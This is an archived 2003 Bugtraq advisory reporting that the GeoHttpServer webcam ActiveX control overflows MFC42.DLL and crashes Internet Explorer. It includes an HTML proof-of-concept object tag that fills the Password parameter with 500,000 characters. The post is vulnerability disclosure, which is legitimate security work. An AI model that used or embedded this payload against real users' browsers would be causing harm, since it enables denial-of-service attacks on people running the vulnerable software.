| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <000201c3bf52$16521f10$ded2b3d4@fucku> Date: Wed, 10 Dec 2003 21:16:17 +0200 From: "Rafel Ivgi" <nuritrv18@...eqint.net> To: <bugtraq@...urityfocus.com> Subject: GeoHttpServer[webcam] Causes MFC42.DLL to overflow GeoHttpServer[webcam] Causes MFC42.DLL to overflow Discovered by Rafel Ivgi, The-Insider. http://theinsider.deep-ice.com The GeoHttpServer Login Java Applet Causes MFC42.DLL to overflow. The Overflow occures when the "Password" parameter of the applet is filled with 500000 times "a". This bug causes Internet Explorer to be closed. Exploit: <object classid="clsid:BF5E26B7-7087-4C2D-B0BA-0098F7CBED6B" id="WebCamX1" width="355" height="300" codebase="http://<GeoHttpServerip>/cab/Live.cab#version=5,3,0,1"> <param name="_Version" value="327682"> <param name="_ExtentX" value="9393"> <param name="_ExtentY" value="7938"> <param name="_StockProps" value="0"> <param name="IpAddress" value="<GeoHttpServerip>"> <param name="CommandPort" value="4550"> <param name="AudioDataPort = "6550"> <param name="DataPort" value="5550"> <param name="BandWidth" value="LAN"> <param name="FixSize" value="0"> <param name="DisablePWD" value="1"> <param name="Password" value="<a x 500000>"> <param name="UserName" value"default"> <param name="AutoLogin" value="0"> <param name="DefaultCam" value="1"> <param name="FixWidth" value="320"> <param name="FixHeight" value="240"> </object> "Things that are unlikeable, are NOT impossible." "A vulnerability doesn't exsist, until you expose it."
Powered by blists - more mailing lists